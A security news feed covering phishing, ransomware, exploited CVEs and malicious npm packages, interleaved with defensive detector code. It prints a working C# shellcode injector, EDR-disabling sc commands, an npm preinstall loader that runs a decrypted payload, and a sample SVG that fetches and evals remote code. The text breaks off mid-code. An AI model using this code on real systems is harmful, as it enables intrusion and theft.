• A recently uncovered vulnerability in the Visual Studio Code (VS Code) Marketplace has allowed malicious actors to hijack discontinued extension names and slip malware past unsuspecting developers. In June, ReversingLabs (RL) researchers discovered a new malicious extension, ahbanC.shiba, that bore the same “shiba” identifier as a ransomware-capable extension removed in March—despite official documentation asserting extension […]

    The post VS Code Marketplace Abused by Threat Actors to Deliver Malware via Trusted Extensions appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • As students and staff returned to campuses this August, a stark rise in cyber attacks against educational institutions has been observed worldwide.

    From January to July 2025, organizations in the education sector faced an average of 4,356 attacks per organization per week, a 41 percent year-over-year increase. These range from credential-harvesting phishing domains to the delivery of malicious code aimed at compromising networks and exfiltrating sensitive data.

    The emergence of themed phishing campaigns timed to the back-to-school rush has amplified both volume and sophistication of these threats, exploiting end-user urgency and reliance on digital platforms.

    Attacks have struck uniformly across all regions, but Asia-Pacific organizations faced the heaviest onslaught, with 7,869 average weekly attacks per organization.

    North America saw the steepest spike, rising 67 percent YoY, while Europe and Africa recorded increases of 48 percent and 56 percent respectively.

    At the country level, Italy led with 8,593 attacks per organization, followed by Portugal at 5,488, Hong Kong at 5,399, and the United States at 2,912.

    Check Point analysts noted that the scale and timing of these surges indicate attackers are leveraging the seasonal spike in digital activity to maximize impact and evade detection.

    Beyond sheer volume, attackers have refined their techniques. In July alone, over 18,000 new domains mimicking academic institutions were registered, with one in every 57 flagged as malicious or suspicious.

    These domains often host impersonation pages that mimic Microsoft’s login interfaces. Check Point researchers identified multiple campaigns where malware payloads were delivered via seemingly benign SVG attachments or QR-encoded PDF forms, enabling credential theft and the deployment of secondary loaders.

    Infection Mechanism

    A deeper look at the malware’s infection chain reveals a multi-stage process designed for persistence and evasion.

    Initial compromise begins with a phishing email containing either a crafted SVG file or a PDF disguised as a university communication.

    When opened, the SVG invokes an embedded JavaScript that fetches a payload from a typo-squatted domain.
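An SVG is XML, so the mail gateway or SOC can answer "is this attachment a picture or a program?" by walking the tree rather than by extension. The scanner below is an added example, not code from the Check Point report; both sample files are constructed, and the registrar-univ-portal.example domain is a placeholder for the typo-squatted host described above. It flags the three things that turn an SVG into active content: script and foreignObject elements (and any URL a script pulls from), on* event handlers, and javascript:/data: or remote hrefs on elements that fetch when rendered.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples (not from the Check Point report): a plain logo, and an
# attachment shaped like the lure described above, with a <script> that pulls a
# second stage from a look-alike registrar domain and a javascript: link.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">
  <circle cx="32" cy="32" r="30" fill="#003366"/>
</svg>"""

LURE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <text x="10" y="20">Registrar: action required before term start</text>
  <script>fetch("https://registrar-univ-portal.example/s.js").then(r=>r.text()).then(eval);</script>
  <a xlink:href="javascript:location='https://registrar-univ-portal.example/login'">
    <rect width="200" height="40" onclick="alert(1)"/>
  </a>
</svg>"""

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)          # onload, onclick, ...
SCRIPT_URI = re.compile(r"^\s*(javascript|vbscript|data):", re.IGNORECASE)
REMOTE_URI = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
URL_IN_TEXT = re.compile(r"https?://[^\s'\"()<>]+")
# Elements whose href is fetched when the image is rendered.
FETCHING_TAGS = {"script", "image", "use", "feimage", "font-face-uri"}


def _local(qname):
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qname.rsplit("}", 1)[-1].lower()


def svg_findings(svg_bytes):
    """List the reasons an SVG must be treated as active content; [] means a passive image."""
    # xml.etree does not defend against entity-expansion bombs; feed untrusted
    # attachments through defusedxml in production.
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return ["unparseable XML: %s" % exc]
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ("script", "foreignobject"):
            findings.append("<%s> element" % tag)
            for url in URL_IN_TEXT.findall(el.text or ""):
                findings.append("%s references %s" % (tag, url))
        for attr, value in el.attrib.items():
            name = _local(attr)
            if EVENT_ATTR.match(name):
                findings.append("%s handler on <%s>" % (name, tag))
            elif name == "href":
                scheme = SCRIPT_URI.match(value)
                if scheme:
                    findings.append("%s URI on <%s>" % (scheme.group(1).lower(), tag))
                elif REMOTE_URI.match(value) and tag in FETCHING_TAGS:
                    findings.append("remote fetch from <%s>: %s" % (tag, value.strip()))
    return findings


def is_active_svg(svg_bytes):
    """Gateway decision: quarantine anything with at least one finding."""
    return bool(svg_findings(svg_bytes))


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SVG), ("lure", LURE_SVG)):
        print(label, svg_findings(blob))
```

The check is deliberately structural rather than signature-based: a browser or mail client that renders the SVG will honour any of these constructs regardless of how the JavaScript inside is obfuscated, so the presence of the construct, not its content, is the detection.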

    // Simplified loader injection snippet. This illustrates classic remote-thread
    // injection; the real loader performs process hollowing, which additionally
    // starts the host suspended, unmaps its image and rewrites the entry point
    // before resuming the main thread.
    using System;
    using System.Diagnostics;
    using System.Runtime.InteropServices;
    
    class Injector {
        const int PROCESS_ALL_ACCESS = 0x1F0FFF;
        const uint MEM_COMMIT_RESERVE = 0x3000;      // MEM_COMMIT | MEM_RESERVE
        const uint PAGE_EXECUTE_READWRITE = 0x40;
    
        [DllImport("kernel32.dll")] static extern IntPtr OpenProcess(int access, bool inherit, int pid);
        [DllImport("kernel32.dll")] static extern IntPtr VirtualAllocEx(IntPtr h, IntPtr addr, uint size, uint type, uint protect);
        [DllImport("kernel32.dll")] static extern bool WriteProcessMemory(IntPtr h, IntPtr addr, byte[] data, int size, out IntPtr written);
        [DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr h, IntPtr attrs, uint stack, IntPtr start, IntPtr arg, uint flags, out IntPtr id);
    
        static void Main(string[] args) {
            // Spawn a legitimate-looking host and open it with full rights.
            Process target = Process.Start("svchost.exe");
            IntPtr h = OpenProcess(PROCESS_ALL_ACCESS, false, target.Id);
            byte[] shellcode = Convert.FromBase64String("..."); // encrypted payload, decrypted in memory
            // The shellcode needs a fresh RWX region: the module's image base is
            // mapped read-only, so writing there would fail.
            IntPtr remote = VirtualAllocEx(h, IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE);
            WriteProcessMemory(h, remote, shellcode, shellcode.Length, out _);
            // Run the payload on a new thread inside the host process.
            CreateRemoteThread(h, IntPtr.Zero, 0, remote, IntPtr.Zero, 0, out _);
        }
    }

    The payload is a .NET executable that decrypts in memory and drops a lightweight malware loader into the Windows Startup folder for persistence.

    Metric                                            | Value
    --------------------------------------------------|------------
    Average Weekly Attacks per Organization (Global)  | 4,356
    Year-over-Year Increase                           | +41 percent
    APAC Average Weekly Attacks per Organization      | 7,869
    North America YoY Increase                        | +67 percent
    Europe YoY Increase                               | +48 percent
    Africa YoY Increase                               | +56 percent
    Italy Attacks per Organization                    | 8,593
    United States Attacks per Organization            | 2,912
    Malicious Academic-themed Domains (July)          | 1 in 57

    Detection evasion relies on process hollowing: the loader starts a legitimate process such as svchost.exe in a suspended state, unmaps its image from memory, writes the malicious code into the hollowed address space and resumes execution, so the payload runs under a trusted process name and path.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Cyber Attacks Targeting Education Sector Surges Following Back-to-School Season appeared first on Cyber Security News.

  • A sophisticated ransomware attack has emerged targeting organizations through compromised third-party managed service provider (MSP) credentials, showcasing the evolving tactics of cybercriminals in 2025.

    The Sinobi Group, operating as a Ransomware-as-a-Service (RaaS) affiliate, successfully infiltrated corporate networks by exploiting SonicWall SSL VPN credentials mapped to over-privileged Active Directory accounts with domain administrator rights.

    The attack campaign demonstrates a concerning trend where threat actors leverage trusted third-party relationships to gain initial network access, bypassing traditional perimeter defenses.

    Once inside the network, the attackers established persistence by creating new administrator accounts and executing lateral movement across the compromised infrastructure, ultimately deploying the Sinobi ransomware payload across local and shared network drives.

    eSentire analysts identified significant code overlaps between Sinobi and the previously known Lynx ransomware, suggesting that Sinobi represents a rebrand of the Lynx RaaS operation that first emerged in 2024.

    The security researchers noted with medium confidence that the Lynx group likely purchased the INC Ransomware source code from a user named “salfetka” through underground hacking forums, indicating the commercialization of ransomware development tools.

    Lynx vs Sinobi leak-site comparison (Source – eSentire)

    The malware’s technical sophistication becomes apparent through its systematic approach to disabling security controls and maximizing encryption impact.

    Upon gaining access, the threat actors attempted to uninstall Carbon Black EDR using both Revo Uninstaller and command-line operations, eventually succeeding after discovering deregistration codes stored on mapped network drives.

    Advanced Encryption and Data Exfiltration Mechanisms

    The Sinobi ransomware uses a hybrid scheme: each file is encrypted with AES-128-CTR under its own key, and that key material is protected with the attacker's Curve25519 (curve25519-donna) public key, so recovery is impossible without the attacker's private key.

    The per-file keys are drawn from CryptGenRandom, so they cannot be predicted or recovered from a weak random number generator.

    Before encrypting, the ransomware removes volume shadow copies without calling vssadmin or WMI: it issues DeviceIoControl with the IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE control code to shrink the shadow storage area, which makes Windows discard the existing snapshots and sidesteps detections keyed on the usual vssadmin and wmic command lines.

    To neutralise the Carbon Black sensor (service name cbdefense), the actors first set the service to disabled, then repointed its binary path at an attacker-controlled executable and forced a reboot so the change would take effect:-

    sc config cbdefense start= disabled
    cmd /c sc config cbdefense binpath= "C:\programdata\bin.exe" & shutdown /r /t 0
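Both commands leave a very loud trace in process-creation telemetry (Sysmon Event ID 1 or Security 4688), and the pattern generalises to every EDR service name. The detector below is an added example, not part of the eSentire report or of any product: the sample command lines are constructed (the first two reproduce the commands above), and the list of protected service names is an assumption to extend for your own estate. It flags sc config/stop/delete and net stop against those services, and notes when a binpath change is chained to an immediate reboot.

```python
import re

# Illustrative list of EDR/AV service names (an assumption; extend for your estate).
PROTECTED_SERVICES = {
    "cbdefense",                 # Carbon Black Cloud sensor, the service targeted above
    "sense", "windefend",        # Microsoft Defender for Endpoint / Defender Antivirus
    "csfalconservice",           # CrowdStrike Falcon
    "sentinelagent",             # SentinelOne
}

# Constructed process command lines, as logged by Sysmon EID 1 / Security 4688.
SAMPLE_EVENTS = [
    r'sc config cbdefense start= disabled',
    r'cmd /c sc config cbdefense binpath= "C:\programdata\bin.exe" & shutdown /r /t 0',
    r'sc query cbdefense',
    r'sc config Spooler start= disabled',
    r'net stop CSFalconService',
    r'C:\Windows\System32\sc.exe stop sense',
]

# "sc [\\host] <verb> <service> <rest>", tolerating cmd /c prefixes and full paths.
SC_CMD = re.compile(
    r"(?:^|[\s&|;\\])sc(?:\.exe)?\s+(?:\\\\\S+\s+)?(config|stop|delete|failure)\s+\"?([^\s\"]+)\"?(.*)$",
    re.IGNORECASE | re.DOTALL)
NET_STOP = re.compile(r"(?:^|[\s&|;\\])net(?:1|\.exe)?\s+stop\s+\"?([^\s\"]+)", re.IGNORECASE)


def classify_command(cmdline):
    """Return (service, reasons) when cmdline tampers with a protected service, else None."""
    reasons, service = [], None
    m = SC_CMD.search(cmdline)
    if m:
        verb, svc, rest = m.group(1).lower(), m.group(2).lower(), m.group(3).lower()
        if svc in PROTECTED_SERVICES:
            service = svc
            if verb == "config":
                if re.search(r"start=\s*(?:disabled|demand)", rest):
                    reasons.append("start type changed")
                if "binpath=" in rest:
                    reasons.append("binary path replaced")
                if re.search(r"\bshutdown(?:\.exe)?\s+/r", rest):
                    reasons.append("immediate reboot chained")
            elif verb == "failure":
                reasons.append("failure action changed")
            else:
                reasons.append("service %s" % verb)
    n = NET_STOP.search(cmdline)
    if n and n.group(1).lower() in PROTECTED_SERVICES:
        service = n.group(1).lower()
        reasons.append("stopped via net")
    return (service, reasons) if reasons else None


def scan_process_events(command_lines):
    """(index, service, reasons) for every command line that should raise an alert."""
    alerts = []
    for i, line in enumerate(command_lines):
        hit = classify_command(line)
        if hit:
            alerts.append((i, hit[0], hit[1]))
    return alerts


if __name__ == "__main__":
    for alert in scan_process_events(SAMPLE_EVENTS):
        print(alert)
```

A query against the service (sc query) and the same change applied to a non-security service (Spooler) are left alone, which keeps the rule quiet on routine administration; the binpath-plus-reboot combination is worth its own high-severity alert because it means the sensor will not come back after the restart.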

    Data exfiltration occurs through RClone, a legitimate cloud transfer utility, directing stolen information to servers operated by Global Connectivity Solutions LLP, a hosting provider frequently observed in cyberattacks.

    Ransom note wallpaper (Source – eSentire)

    The ransomware creates encrypted files with the .SINOBI extension and deploys README.txt ransom notes containing Tor-based communication channels and payment instructions, demanding victims negotiate within seven days to prevent data publication on dark web leak sites.

    The attack underscores the critical importance of implementing strict privilege management for remote access accounts and avoiding storage of security tool deregistration codes in accessible network locations.

    The post Hackers Leverage Compromised Third-Party SonicWall SSL VPN Credentials to Deploy Sinobi Ransomware appeared first on Cyber Security News.

  • A sophisticated backdoor has been found in AppSuite PDF Editor that enables threat actors to execute arbitrary commands on compromised Windows systems. Initially flagged as a potentially unwanted program because of its aggressive installation behavior, AppSuite’s true nature was revealed when its malicious components were deobfuscated and analyzed. Threat actors exploited high-ranking PDF tool websites to distribute a […]

    The post AppSuite PDF Editor Exploit Lets Hackers Run Arbitrary Commands appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Amazon on Friday said it flagged and disrupted what it described as an opportunistic watering hole campaign orchestrated by the Russia-linked APT29 actors as part of their intelligence gathering efforts. The campaign used “compromised websites to redirect visitors to malicious infrastructure designed to trick users into authorizing attacker-controlled devices through Microsoft’s device code

  • An abandoned update server associated with input method editor (IME) software Sogou Zhuyin was leveraged by threat actors as part of an espionage campaign to deliver several malware families, including C6DOOR and GTELAM, in attacks primarily targeting users across Eastern Asia. “Attackers employed sophisticated infection chains, such as hijacked software updates and fake cloud storage or login

  • Cybersecurity teams worldwide have observed a surge in sophisticated campaigns exploiting both Windows and Linux vulnerabilities in recent months to achieve unauthorized system access.

    These attacks often begin with phishing emails or malicious web content designed to deliver weaponized documents. Once opened, the embedded exploits target unpatched vulnerabilities in commonly used software components, allowing attackers to execute arbitrary code on victim machines.

    As organizations struggle to keep pace with patch management, threat actors have intensified their focus on high-impact flaws that remain unaddressed in many environments.

    Securelist researchers identified that several long-standing vulnerabilities in Microsoft Office’s Equation Editor continue to be a favorite initial access vector.

    CVE-2018-0802 and CVE-2017-11882, both remote code execution flaws in the Equation Editor component, remain heavily exploited despite patches being available for years.

    In addition, CVE-2017-0199, a flaw affecting Office and WordPad, provides another path for payload delivery.

    These Office exploits are often combined with more recent Windows File Explorer and driver vulnerabilities, such as CVE-2025-24071, which leaks NetNTLM credentials when a crafted .library-ms file is extracted from an archive, and CVE-2024-35250, a privilege-escalation flaw in the Kernel Streaming driver ks.sys, to establish a foothold and escalate privileges.

    Beyond Microsoft Office, attackers have also leveraged WinRAR’s archive-handling weaknesses: CVE-2023-38831, where opening a benign-looking file from an archive runs a script staged in a same-named folder, and the directory traversal flaw CVE-2025-6218, which lets an archive write files outside the chosen extraction directory, for example into a Startup folder for persistence.

    On the Linux side, the Dirty Pipe vulnerability (CVE-2022-0847) remains a critical favorite for privilege escalation, while CVE-2019-13272 and CVE-2021-22555 continue to be used to gain root access on unpatched servers.

    Infection Mechanism

    A particularly insidious infection mechanism combines Office-based delivery with secondary exploitation of system drivers. Securelist analysts noted that attackers craft RTF documents containing shellcode that invokes Equation Editor through OLE objects.

    Once the vulnerability triggers, shellcode downloads a two-stage payload: a small loader and a full-featured malware binary.

    The loader uses CVE-2025-24071 to make the victim host authenticate outbound to an attacker-controlled SMB server; the captured NetNTLMv2 responses are forwarded to a C2 server for offline cracking or relay.

    The full payload then exploits CVE-2024-35250 to escalate to SYSTEM and load a malicious driver into kernel space, granting attackers unrestricted code execution.

    This dual-exploit chain allows adversaries to bypass user-level defenses and deploy rootkits undetected.

    Payload published online (Source – Securelist)

    In many incidents, once kernel-level control is achieved, attackers install open-source C2 frameworks such as Sliver or Havoc to maintain persistence.

    These implants include in-memory protection to evade antivirus scans and use legitimate Windows services to blend into normal processes.

    By chaining publicly known exploits, actors can rapidly move from initial compromise to full system control without writing suspicious files to disk.
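Both WinRAR flaws above and the .library-ms trick are archive-listing problems before they are anything else: an extractor that inspects every entry name and, for library files, the entry body, refuses the lure before anything touches disk or Explorer. The guard below is an added example, not code from Securelist or from WinRAR; it uses ZIP rather than RAR because Python ships a ZIP reader, and the sample archive and the .library-ms body are constructed (10.0.0.5 stands in for the attacker's SMB host). It rejects absolute paths, entries that resolve outside the destination, and .library-ms entries that point at a UNC share.

```python
import io
import os
import re
import zipfile

# Constructed .library-ms body pointing Explorer at a UNC share: once such a file
# is extracted, Explorer parses it and the host authenticates to that share.
LIBRARY_MS = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\10.0.0.5\\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

UNC_RE = re.compile(rb"\\\\([A-Za-z0-9._-]+)\\")   # \\host\share
ABSOLUTE_RE = re.compile(r"^(?:[A-Za-z]:|[\\/])")


def build_sample_archive(include_bad=True):
    """Constructed ZIP: one real document plus, optionally, the three entry types to refuse."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2025.pdf", b"%PDF-1.4 placeholder")
        if include_bad:
            zf.writestr("../../Users/Public/Startup/update.exe", b"MZ placeholder")
            zf.writestr("C:/Windows/Temp/drop.bat", b"@echo off")
            zf.writestr("Shared.library-ms", LIBRARY_MS)
    return buf.getvalue()


def entry_escapes(dest, name):
    """True if extracting `name` under `dest` would land outside `dest`."""
    root = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(root, name.replace("\\", "/")))
    return not (target == root or target.startswith(root + os.sep))


def archive_findings(zip_bytes, dest):
    """(entry name, reason) for every entry a safe extractor must reject."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if ABSOLUTE_RE.match(name):
                findings.append((name, "absolute path"))
            elif entry_escapes(dest, name):
                findings.append((name, "path traversal"))
            elif name.lower().endswith(".library-ms"):
                m = UNC_RE.search(zf.read(info))
                if m:
                    findings.append((name, "library-ms targeting \\\\%s" % m.group(1).decode()))
    return findings


def refuses(zip_bytes, dest):
    return bool(archive_findings(zip_bytes, dest))


def safe_extract(zip_bytes, dest):
    """Extract only after the whole listing passes; a single bad entry aborts the job."""
    bad = archive_findings(zip_bytes, dest)
    if bad:
        raise ValueError("refusing to extract: %r" % bad)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return [i.filename for i in zf.infolist()]


if __name__ == "__main__":
    for finding in archive_findings(build_sample_archive(), "/tmp/extract"):
        print(finding)
```

Python's own zipfile already strips drive letters and ".." during extractall, so the traversal entry is harmless to this script; the check reproduces the guard a vulnerable extractor lacked, applied to the names exactly as the archive stores them. Rejecting the whole archive rather than skipping the bad entry matters for the library-ms case, because the harmless-looking entries are the bait that gets the archive opened in the first place.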

    Vulnerability Details:-

    CVE            | Description                                         | Exploit Type                  | Affected Platform
    ---------------|-----------------------------------------------------|-------------------------------|------------------
    CVE-2018-0802  | RCE in Office Equation Editor                       | Embedded OLE exploit          | Windows
    CVE-2017-11882 | RCE in Office Equation Editor                       | Embedded OLE exploit          | Windows
    CVE-2017-0199  | RCE via OLE2Link/HTA handler in Office and WordPad  | Script-based document exploit | Windows
    CVE-2023-38831 | Improper file handling in WinRAR                    | Archive code execution        | Windows
    CVE-2025-24071 | NetNTLM credential theft via .library-ms files      | Credential theft (coerced SMB authentication) | Windows
    CVE-2024-35250 | Privilege escalation in ks.sys (Kernel Streaming)   | Kernel driver exploit         | Windows
    CVE-2022-0847  | Dirty Pipe privilege escalation                     | Pipe buffer overwrite         | Linux
    CVE-2019-13272 | ptrace (PTRACE_TRACEME) credential handling flaw    | Privilege escalation          | Linux
    CVE-2021-22555 | Heap overflow in Netfilter x_tables                 | Heap-based overflow           | Linux
    CVE-2025-6218  | Directory traversal in WinRAR                       | Archive path manipulation     | Windows

    This consolidated view highlights the persistence of older vulnerabilities alongside newer flaws, underscoring the critical need for timely patching and comprehensive defense-in-depth strategies.

    Organizations should prioritize updates for both user applications and system components to mitigate the risk of these prevalent exploits in real-world attacks.

    The post Threat Actors Leveraging Windows and Linux Vulnerabilities in Real-world Attacks to Gain System Access appeared first on Cyber Security News.

  • Google has confirmed that a security breach involving the Salesloft Drift platform is more extensive than initially reported, potentially compromising all authentication tokens connected to the service.

    The new findings from the Google Threat Intelligence Group (GTIG) indicate that the incident, previously thought to be limited to Salesforce integrations, affects all third-party applications connected to Drift.

    Google is now advising all Salesloft Drift customers to consider any and all authentication tokens stored in or linked to the Drift platform as potentially compromised and to take immediate remedial action.

    The investigation into the breach began after GTIG identified a widespread data theft campaign conducted by a threat actor tracked as UNC6395.

    OAuth Tokens Compromised

    Between August 8 and August 18, 2025, the actor exploited compromised OAuth tokens associated with the Salesloft Drift third-party application to systematically export large volumes of data from numerous corporate Salesforce instances.

    GTIG assesses that the primary motive was to harvest sensitive credentials, including Amazon Web Services (AWS) access keys, passwords, and Snowflake-related access tokens from the exfiltrated data.
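The credential types GTIG lists here are exactly what an affected organisation should sweep its own Salesforce export for, so that rotation starts with the keys that were demonstrably exposed rather than with everything at once. The scanner below is an added example, not code from Google, Salesloft or the report: the records are constructed, the AWS patterns follow the documented AKIA/ASIA key-ID shape and AWS's published example key pair, and the generic key=value match is a heuristic to tune. It reports which record and field leaked what, with the value redacted so the report itself is safe to share.

```python
import re

# Constructed Salesforce-style records (not from the GTIG report): the free-text
# fields (case descriptions, notes) that the actor exported wholesale.
SAMPLE_RECORDS = [
    {"Id": "5003000000ABC01", "Subject": "Login issue",
     "Description": "User reports password: Summer2025! and asks for a reset."},
    {"Id": "5003000000ABC02", "Subject": "Integration setup",
     "Description": "Shared by customer: aws_access_key_id=AKIAIOSFODNN7EXAMPLE "
                    "aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"},
    {"Id": "5003000000ABC03", "Subject": "Renewal",
     "Description": "Commercial discussion only, no technical content."},
    {"Id": "5003000000ABC04", "Subject": "Snowflake trial",
     "Description": "Snowflake access token: SfTrialToken-2025-constructed-value"},
]

# Patterns: a documented key-ID format first, then a labelled secret, then a
# generic "<credential word> = value" heuristic that catches everything else.
PATTERNS = (
    ("aws_access_key_id",
     re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")),
    ("aws_secret_access_key",
     re.compile(r"aws[_-]?secret[_-]?access[_-]?key\s*[:=]\s*\"?([A-Za-z0-9/+=]{40})\b", re.IGNORECASE)),
    ("credential",
     re.compile(r"\b(password|passwd|pwd|token|api[_-]?key|secret)\s*[:=]\s*\"?(\S{8,})", re.IGNORECASE)),
)


def redact(value):
    """Keep a 4-character prefix so analysts can match findings to rotations."""
    return "%s...(%d chars)" % (value[:4], len(value))


def scan_records(records, id_field="Id"):
    """One finding per secret-looking match: record id, field, kind and a redacted preview."""
    findings = []
    for rec in records:
        for field, text in rec.items():
            if field == id_field or not isinstance(text, str):
                continue
            for kind, rx in PATTERNS:
                for m in rx.finditer(text):
                    value = m.group(m.lastindex)
                    # The generic pattern also captures the credential word it matched.
                    label = kind if m.lastindex == 1 else "%s:%s" % (kind, m.group(1).lower())
                    findings.append({"record": rec[id_field], "field": field,
                                     "kind": label, "preview": redact(value)})
    return findings


def affected_record_ids(findings):
    """Records to pull for the customer notification and the rotation checklist."""
    return sorted({f["record"] for f in findings})


if __name__ == "__main__":
    for f in scan_records(SAMPLE_RECORDS):
        print(f)
    print(affected_record_ids(scan_records(SAMPLE_RECORDS)))
```

Run it over the same object types the Drift integration had scope to read (the Salesforce Event Log or the connected app's OAuth scopes tell you which), and treat every hit as compromised: the point of the exercise is a rotation list, not a risk score.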

    In response to the initial discovery, Salesloft, in collaboration with Salesforce, took action on August 20, 2025. They revoked all active access and refresh tokens for the Drift application and temporarily removed it from the Salesforce AppExchange.

    At the time, both companies believed the impact was contained to customers who integrated Drift with Salesforce.

    However, the investigation took a critical turn on August 28, 2025, when it was confirmed that the threat actor had also compromised OAuth tokens for the “Drift Email” integration.

    Evidence showed that on August 9, 2025, the actor used these tokens to access emails from a very small number of Google Workspace accounts that had been specifically configured to integrate with Salesloft. Google has clarified that the actor could not have accessed any other accounts within a customer’s Workspace domain.

    “To be clear, there has been no compromise of Google Workspace or Alphabet itself,” a Google spokesperson stated.

    In light of these new findings, Google has taken swift action to protect its customers. The company identified the impacted users, revoked the specific OAuth tokens granted to the Drift Email application, and disabled the integration functionality between Google Workspace and Salesloft Drift pending further investigation. All affected Google Workspace administrators are being notified directly.

    The incident highlights the complex security challenges posed by interconnected third-party applications. While the breach did not stem from a vulnerability within the core platforms of Google or Salesforce, it demonstrates how a compromise in one service can create a ripple effect across integrated systems.

    Salesloft has now engaged the cybersecurity firm Mandiant to assist in its ongoing investigation and has updated its security advisory.

    Organizations using Salesloft Drift are strongly advised to take immediate defensive measures. Recommendations include conducting a thorough review of all third-party integrations connected to their Drift instance, revoking and rotating all associated credentials, and actively investigating all connected systems for any signs of unauthorized access or suspicious activity.

    The post Google Confirms Potential Compromise of All Salesloft Drift Customer Authentication Tokens appeared first on Cyber Security News.

  • On August 28, 2025, the Hikvision Security Response Center (HSRC) issued Security Advisory SN No. HSRC-202508-01, detailing three vulnerabilities affecting various HikCentral products. Assigned CVE-2025-39245, CVE-2025-39246, and CVE-2025-39247, they range in severity from moderate to high and could enable attackers to execute unauthorized commands, escalate privileges, or obtain administrative access. […]

    The post Critical Hikvision Vulnerabilities Allow Remote Command Injection appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Over the past year, security researchers have observed a growing trend of North Korean–linked developers establishing credible-looking profiles on popular code-sharing platforms such as GitHub, CodeSandbox, and Gist.

    These accounts frequently host legitimate open-source projects alongside hidden payloads, allowing operators to mask malicious activity under the guise of normal developer contributions.

    The overall goal appears to be multifaceted: generating revenue for state-sponsored programs, obtaining access to remote work contracts, and using those engagements as beachheads for more sophisticated cyber operations.

    Initially, these profiles attracted attention due to unusually high activity levels and the adoption of advanced software stacks—including React.js front ends, Node.js back ends, and Dockerized deployment configurations—designed to impress prospective clients.

    However, a deeper analysis revealed carefully obfuscated modules within certain repositories that leveraged compromised dependencies to deliver remote access trojans.

    THE RAVEN FILE analysts noted that these repositories often employed minimalistic README files to distract from hidden directories named .secret or .vendor where malicious payloads were staged.

    The impact of these operations has been significant. Several victims unknowingly installed tainted packages during routine dependency updates, granting attackers persistent access to corporate networks or cloud environments.

    In one documented case, a financial services firm imported a library called @jupyter-utils/rpc that contained a loader script intercepting WebSocket connections and exfiltrating credentials via an embedded C2 channel.

    The combination of legitimate functionality and covert communication made detection extremely difficult for standard signature-based scanners.

    Infection Mechanism and Persistence Tactics

    A closer look at the infection mechanism reveals a multi-stage loader that activates only when certain environmental conditions are met.

    Upon installation, the malicious package executes a preinstall script defined in package.json:-

    "scripts": {
      "preinstall": "node scripts/setup.js"
    }

    The setup.js module then checks for the presence of common CI/CD directories (.gitlab-ci, .github/workflows) before deploying an encrypted payload into the application’s runtime directory.

    This payload, stored as payload.enc, is decrypted in memory with a key the loader carries (the recovered snippet reads it from the DEPLOY_KEY environment variable) and immediately executed via Node’s vm module, so the plaintext never touches disk:-

    const vm = require('vm');
    const fs = require('fs');
    // Key material comes from the environment the loader was launched with;
    // decrypt() is the symmetric routine shipped with the loader (not reproduced in the report).
    const key = Buffer.from(process.env.DEPLOY_KEY, 'hex');
    const cipher = fs.readFileSync('./payload.enc');
    const decrypted = decrypt(cipher, key).toString();
    // Runs the plaintext in the current V8 context: no temp file, no child process.
    vm.runInThisContext(decrypted);
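The defensive counterpart to the chain above is an inventory of every lifecycle hook in the dependency tree, with the script file each hook runs pulled in and scored. The auditor below is an added example, not code from THE RAVEN FILE; it writes a constructed project tree to a temporary directory (one package shaped like the @jupyter-utils/rpc case, one legitimate-looking native package that downloads a prebuilt binary, two with no hooks) and then walks it. Marker names, the hidden-directory list and the sample tree are all assumptions made for the example.

```python
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
HIDDEN_STAGING_DIRS = {".secret", ".vendor"}      # directory names called out in the report
# Heuristic markers (an assumption); each is scored on the hook command plus the
# contents of any local .js file the command hands to node.
RISK_MARKERS = (
    ("runs-script-file", re.compile(r"\bnode\s+\S+\.[cm]?js\b")),
    ("network", re.compile(r"\b(?:curl|wget|https?\.get|fetch)\b")),
    ("dynamic-eval", re.compile(r"\b(?:eval|new Function|vm\.runInThisContext|vm\.runInNewContext)\b")),
    ("decodes-payload", re.compile(r"base64|atob\(|createDecipheriv|\.enc\b", re.IGNORECASE)),
)


def build_sample_tree():
    """Write a constructed node project to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="npm-audit-")

    def put(rel, content):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)

    put("package.json", json.dumps({"name": "portal", "scripts": {"test": "jest"}}))
    put("node_modules/left-pad/package.json", json.dumps({"name": "left-pad"}))
    # Legitimate-looking native package that fetches a prebuilt binary on install.
    put("node_modules/fast-native/package.json",
        json.dumps({"name": "fast-native", "scripts": {"postinstall": "node install.js"}}))
    put("node_modules/fast-native/install.js",
        "const https = require('https');\n"
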